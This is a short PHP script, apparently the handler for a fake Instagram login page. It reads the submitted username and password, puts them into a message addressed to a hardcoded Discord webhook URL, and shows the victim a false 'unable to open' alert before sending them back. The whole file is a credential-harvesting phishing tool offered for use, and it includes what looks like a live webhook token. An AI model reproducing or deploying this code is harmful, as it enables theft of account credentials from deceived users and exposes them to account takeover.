<?php

//varible setting
$username = $_REQUEST['u_name'];  // fetch username
 $passcode = $_REQUEST['pass'];  // fetch password
 $subject = "Someone Login ! Insta Dummy page";
 $to ="https://discord.com/api/webhooks/996208292097425440/ZG7eOhOAuhTVox1rjzxstl-x-AOFvqKLfe4LmVJMh6uw-JEB2ACcfGu16_fLU3ULFSJo";
 
 $txt = "Username : ". $username. "\r\nPassword : ". $passcode ; // email body (i) username [break] (ii) password;
 


// check input fields
if (empty($username)|| empty($passcode)){ // name or message
echo"<script type='text/javascript'>alert('Please enter correct username or password. Try again ');
    window.history.go(-1);
    </script>";
}
else 
{ 
    mail($to,$subject,$txt); // send an email 
    echo"<script type='text/javascript'>alert('Sorry ! unable to open ');
    window.history.go(-1);
    </script>";
}


?>
